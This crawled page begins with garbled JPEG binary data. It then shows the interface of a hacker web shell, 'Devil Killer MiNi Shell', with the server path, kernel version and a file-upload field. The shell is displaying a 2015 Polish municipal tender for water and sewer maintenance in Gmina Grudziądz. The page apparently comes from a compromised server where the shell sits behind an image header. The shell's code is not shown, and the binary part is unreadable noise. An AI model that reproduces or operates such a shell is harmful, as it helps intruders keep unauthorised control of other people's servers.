JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150122/15748-N-2015.html

<p class="kh_header"><b>Grudziądz: Bieżące utrzymanie i konserwacja sieci wodociągowo-kanalizacyjnej
na terenie Gminy Grudziądz</b><br>
<b>Numer ogłoszenia: 15748 - 2015; data zamieszczenia: 22.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grudziądz , ul. Wybickiego 38, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4511111, faks 056 4511132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grudziadz.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie i konserwacja sieci wodociągowo-kanalizacyjnej
na terenie Gminy Grudziądz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bieżące utrzymanie i konserwacja sieci wodociągowo-kanalizacyjnej na terenie Gminy
Grudziądz.
1. Opis istniejącej infrastruktury wodociągowo - kanalizacyjnej będącej przedmiotem
zamówienia
Gmina Grudziądz nie posiada własnej stacji uzdatniania wody i oczyszczalni ścieków. Woda
jest nabywana od Spółki Miejskie Wodociągi i Oczyszczalnia w Grudziądzu. Miejscem
dostarczania wody są wodomierze główne, rozdzielające sieć Gminy Grudziądz od sieci
MWIO.
Ścieki z terenu gminy są odprowadzane do kolektorów głównych MWIO i trafiają następnie
do oczyszczalni ścieków w Nowej Wsi. Miejscem odbioru ścieków przez MWIO są gminne
ściekomierze zamontowane na kolektorach głównych.
Zadaniem wykonawcy jest utrzymanie i konserwacja gminnych sieci oraz przyłączy
wodociągowych i kanalizacyjnych a także urządzeń wodociągowych i kanalizacyjnych m. in.
przepompowni ścieków, ściekomierzy, stacji podnoszenia ciśnienia.
Długość gminnej sieci wodociągowej z przyłączami wynosi ok. 370 km. W 2015 r. przewiduje
się wykonanie ok. 8 km sieci wodociągowej.
Długość gminnej sieci kanalizacyjnej z przyłączami wynosi ok. 70 km.
Nowo wybudowane odcinki sieci znajdą się również w zakresie przedmiotu zamówienia
świadczonego przez wykonawcę. Nie spowoduje to wzrostu wynagrodzenia Wykonawcy.
Zbiorcze przepompownie ścieków: 14 szt. .
Przydomowe przepompownie ścieków: ok. 240 szt.
Zamawiający dołączy do niniejszej specyfikacji mapę poglądową istniejącej na terenie Gminy
sieci, objętej przedmiotem zamówienia.
2. Zadania w zakresie utrzymania i konserwacji zbiorowych urządzeń wodociągowych.:
1) Utrzymanie w należytym stanie technicznym urządzeń wodociągowych, a w szczególności
bieżąca konserwacja urządzeń i rurociągów, tj. uzupełnianie wadliwej lub uszkodzonej
armatury i wyposażenia, czyszczenie urządzeń i rurociągów, odpowietrzanie sieci
2) Niezwłoczne usuwanie wszelkich przecieków i nieszczelności na sieciach wodociągowych
i przyłączach
3) Bezzwłoczne przystąpienie do usuwania awarii nie później niż w ciągu 4 godzin od
zgłoszenia i usuwanie awarii jednak nie później niż w ciągu 24 godzin od zgłoszenia.
Zamknięcie odpowiednich zaworów zabezpieczające przed utratą wody z sieci musi nastąpić
do 4 godzin od zgłoszenia. Przez awarie zamawiający rozumie uszkodzenie rurociągów lub
urządzeń wodociągowych powodujące lub mogące spowodować stratę wody, przerwę w
dostawie wody i inne zagrożenia. Wykonawca podejmuje czynności polegające na usunięciu
przyczyn i skutków awarii. W przypadku wystąpienia awarii w okresie dłuższym niż 12
godzin, Wykonawca uruchomi zastępczy, zbiorowy punkt poboru wody. Będzie to możliwie
najbliższy hydrant p.poż. z zamontowanym zaworem.
4) Uruchamianie zastępczego poboru na polecenie Zamawiającego.
5) Prowadzenie dokumentacji eksploatowanych obiektów i sieci
6) Dokonywanie tzw. przyłączeń do sieci wodociągowej dla nowo wybudowanych przyłączy:
- kontrola robót zanikowych,
- konsultacje z Zamawiającym dotyczące projektowanych materiałów,
- zamykanie odpowiednich zaworów na czas wpięcia,
- wykonywanie tzw. nawiertki sieci i połączenie z nowo wybudowanym przyłączem,
- instalacja kompletów wodomierzowych dostarczonych przez Zamawiającego,
- kontrola wykonania i dokonywanie odbiorów wybudowanych przyłączy,
- kontrola użytych przez inwestorów materiałów poprzez porównanie ich z warunkami
wydanymi przez Gminę Grudziądz.
- sporządzanie protokołu odbioru przyłączy,
- dokonywanie odbioru z udziałem przedstawiciela Zamawiającego.
7) Dokonywanie odcięcia dopływu wody do posesji na polecenie Zamawiającego.
8) Realizacja obowiązków wynikających z rozporządzenia ministra zdrowia z dnia 29 marca
2007 r. w sprawie jakości wody przeznaczonej do spożycia przez ludzi (Dz. U. z 2007 r. Nr
61, poz. 417 z późn. zm.), w szczególności:
- badania próbek wody na warunkach opisanych w rozporządzeniu i w porozumieniu
z Sanepidem,
- sporządzanie protokołów z badania
9) Dopełnianie obowiązków wynikających z przepisów ustawy z dnia 21 marca 1985 r. o
drogach publicznych (Dz. U. z 2007 r. Nr 19, poz. 115 z późn. zm.) własnym staraniem i na
własny koszt w przypadku prowadzenia robót w pasie drogowym
10) wymiana legalizacyjna wodomierzy z plombowaniem - ok. 500 sztuk w 2015 r.
11) Zamykanie i otwieranie zasów na przyłączach wodociągowych na żądanie
Zamawiającego. Dotyczy w szczególności zamykania zasów na okres zimowy.
12) Wymiana elementów/materiałów o słabym stanie technicznym po uzgodnieniu
z Zamawiającym lub na żądanie Zamawiającego.
13) Płukanie hydrantów według potrzeb lub na żądanie Zamawiającego (Zamawiający posiada
75 szt.).
14) Wykonywanie pomiarów ciśnienia i wydajności hydrantów na żądanie Zamawiającego.
3. Zadania w zakresie utrzymania i konserwacji zbiorowych urządzeń kanalizacji sanitarnej:
1) Bieżąca konserwacja i naprawy urządzeń, przepompowni ścieków usuwanie awarii i usterek
oraz dbałość o stan techniczny sieci kanalizacyjnej, przyłączy lub odcinków przyłączy
będących w gestii Zamawiającego.
2) Bezzwłoczne przystąpienie do usuwania awarii nie później niż w ciągu 4 godzin od
zgłoszenia i usuwanie awarii jednak nie później niż w ciągu 24 godzin od zgłoszenia.
W przypadku awarii sieci lub przyłączy kanalizacyjnych na czas braku przepływu i usunięcia
awarii ścieki będą wypompowywane i wywożone do oczyszczalni wozem asenizacyjnym na
koszt wykonawcy. Przez awarie zamawiający rozumie uszkodzenie, zatkanie, usterkę itd. rur i
urządzeń kanalizacyjnych powodujące lub mogące spowodować wyciek ścieków, przerwę w
odbiorze ścieków i inne zagrożenia. Wykonawca podejmuje czynności polegające na
usunięciu przyczyn i skutków awarii.
3) Dokonywanie odcięcia odbioru ścieków od dostawców na polecenie Zamawiającego.
4) Dokonywanie tzw. przyłączeń do sieci kanalizacyjnej dla nowo wybudowanych przyłączy:
- kontrola robót zanikowych,
- konsultacje z zamawiającym dotyczące projektowanych materiałów,
- zamykanie odpowiednich zaworów na czas wpięcia,
- wykonywanie połączeń sieci z nowo wybudowanym przyłączem,
- kontrola zainstalowanych urządzeń pomiarowych, których zakup należy do inwestora
wykonującego przyłącze,
- kontrola wykonania i dokonywanie odbiorów wybudowanych przyłączy,
- kontrola zastosowanych przez inwestorów materiałów i urządzeń pomiarowych na
przyłączach kanalizacyjnych poprzez porównanie ich z warunkami wydanymi przez Gminę
Grudziądz.
- sporządzanie protokołu odbioru przyłączy,
- dokonywanie odbioru z udziałem przedstawiciela Zamawiającego.
12) Wymiana elementów/materiałów o słabym stanie technicznym po uzgodnieniu z
Zamawiającym lub na żądanie Zamawiającego. Dotyczy w szczególności zużytych elementów
przepompowni ścieków.
13) Montowanie blokad wypływu ścieków do sieci kanalizacyjnej z przyłączy na żądanie
Zamawiającego.
14) Wykonywanie badań jakościowych ścieków na żądanie i we wskazanych przez
Zamawiającego punktach.
4. Zasady prowadzenia dokumentacji eksploatacyjnej:
- ewidencja awarii i napraw,
- ewidencja wykonywanych czynności kontrolnych wymienionych w kolejnym punkcie (pkt.
5),
- ewidencja zgłoszeń,
- ewidencja wykonanych przez inwestorów przyłączy,
- ewidencja mienia zdemontowanego i zamontowanego
5. Zasady kontroli stanu technicznego sieci i urządzeń:
1) Kontrola sieci wodociągowej i kanalizacyjnej pod względem szczelności - co 1 miesiąc;
2) Kontrola hydrantów p.poż. - co 2 miesiące;
3) Kontrola urządzeń pomiarowych - jednostkowo na podstawie zgłoszeń Zamawiającego i
niezależnie od zgłoszeń Zamawiającego 1 raz w roku przegląd wszystkich urządzeń
pomiarowych,
4) Kontrola przepompowni przydomowych - co 2 miesiące
5) Dokumentowanie fotograficzne zatorów na przydomowych przepompowniach
spowodowanych przez wpuszczenie przez dostawcę ścieków nieodpowiednich odpadów do
sieci - wg potrzeb;
6) Kontrola przepompowni zbiorczych wraz z konserwacją i czyszczeniem - co 1 miesiąc
7) Przed wykonaniem czynności kontrolnych Wykonawca zgłasza Zamawiającemu planowane
kontrolę i datę ich przeprowadzenia. Zamawiający będzie miał możliwość uczestniczenia w
kontroli.
Inne istotne warunki zamówienia:
Do obowiązków wykonawcy należeć będzie także likwidacja (utylizacja) zużytego sprzętu,
urządzeń lub innego wyposażenia, po uzyskaniu wcześniejszej akceptacji Zamawiającego.
Utylizacja następować będzie zgodnie z obowiązującymi przepisami prawa,
Wykonawca przystępujący do przetargu musi: posiadać czynny całodobowo telefon alarmowy,
tzw. pogotowie wodno-kanalizacyjne. Telefon zostanie udostępniony do wiadomości
publicznej mieszkańców gminy. Telefon jest niezbędny do przyjmowania zgłoszeń
dotyczących m. in. awarii i usterek dotyczących zakresu objętego niniejszym postępowaniem.
Przy kalkulacji ceny Wykonawca nie wlicza kosztów zakupionego materiału niezbędnego do
realizacji przedmiotu zamówienia. Koszty zakupów materiałów zastępczych, nowych urządzeń
itp. obciążają Zamawiającego.
W ofercie należy podać cenę całkowitą wynikającą z realizacji zadania przez okres 11 miesięcy. Wykonawca wystawiać będzie faktury za świadczone usługi w systemie miesięcznym, wyliczone jako iloczyn całkowitej ceny ofertowej i liczby miesięcy - tj. 11.  Jeśli pierwszy miesiąc obowiązywania umowy nie będzie pełnym kalendarzowym miesiącem, Zamawiający dokona zapłaty na rzecz Wykonawcy za rzeczywistą ilość dni, w których Wykonawca świadczył usługę, biorąc pod uwagę wynagrodzenie miesięczne..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Bieżące utrzymanie i konserwacja sieci wodociągowo-kanalizacyjnej
na terenie Gminy Grudziądz, do 10% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.51.30.00-4, 90.48.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 8 000.00 PLN (słownie: osiem
tysięcy 00/100 PLN).
Wadium należy wnieść w terminie do dnia 2015-01-30 do godz. 10:00.
Wadium może być wnoszone w jednej lub kilku następujących formach:
a: pieniądzu: przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy
O/Łasin 32950000080008872120000100;
b: poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowokredytowej,
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c: gwarancjach bankowych;
d: gwarancjach ubezpieczeniowych;
e: poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości (t.j. Dz. U. z dnia 2007r. nr 42, poz. 275 z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki,
dotyczące posiadania uprawnień do wykonywania określonej działalności lub
czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena
spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie
spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki,
dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w
postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna
warunek za spełniony jeśli Wykonawca wykaże, że wykonywał min. 1 usługę
polegająca na obsłudze sieci wodociągowej o długości minimum 100 km
nieprzerwanie przez rok i minimum 1 usługę polegającą na obsłudze sieci
kanalizacji sanitarnej o długości minimum 50 km nieprzerwanie przez rok.
Wykonawca nie może w celu wykazania spełniania warunku sumować
utrzymywanych km sieci, które nie stanowią jednego obiektu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że posiada minimum 1 czynny całodobowo telefon alarmowy, tzw. pogotowie wodno-kanalizacyjne i minimum 1 samochód z wyposażeniem niezbędnym do realizacji przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże że posiada ubezpieczenie OC na kwotę minimum 500.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że wykonywał min. 1 usługę polegająca na obsłudze sieci wodociągowej o długości minimum 100 km nieprzerwanie przez rok i minimum 1 usługę polegającą na obsłudze sieci kanalizacji sanitarnej o długości minimum 50 km nieprzerwanie przez rok. Wykonawca nie może w celu wykazania spełniania warunku sumować utrzymywanych km sieci, które nie stanowią jednego obiektu;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

